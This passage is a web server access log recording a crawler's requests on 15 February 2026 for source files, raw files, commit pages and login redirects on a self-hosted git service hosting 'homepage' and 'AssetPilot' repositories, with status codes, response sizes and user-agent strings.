216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 216.73.216.188] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16505] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json?display=source" [Client 216.73.216.188] [Length 12789] [Gzip 2.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14234] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fnpm%2Fdata%2Fdatabase.sqlite" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 216.73.216.188] [Length 11097] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json?display=source" [Client 216.73.216.188] [Length 11091] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" [Client 216.73.216.188] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13955] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 9848] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/css" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13898] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 942] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python?follow_symlink=1" [Client 216.73.216.188] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin" [Client 216.73.216.188] [Length 10162] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 5799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json?display=source" [Client 216.73.216.188] [Length 11317] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 14688] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 216.73.216.188] [Length 9894] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fpackage.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/nginx/proxy_host/1.conf" [Client 216.73.216.188] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11469] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 4755] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fdata%2Fdatabase.sqlite" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14831] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" [Client 216.73.216.188] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 216.73.216.188] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/.gitignore" [Client 216.73.216.188] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10975] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.gitignore" [Client 216.73.216.188] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 11169] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 216.73.216.188] [Length 9921] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/services" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10909] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json?display=rendered" [Client 216.73.216.188] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14213] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16507] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13890] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14233] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/README.md?display=source" [Client 216.73.216.188] [Length 11794] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/status.json" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2Ftsconfig.json" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" [Client 216.73.216.188] [Length 17807] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 13961] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/keys.json" [Client 216.73.216.188] [Length 2186] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14672] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 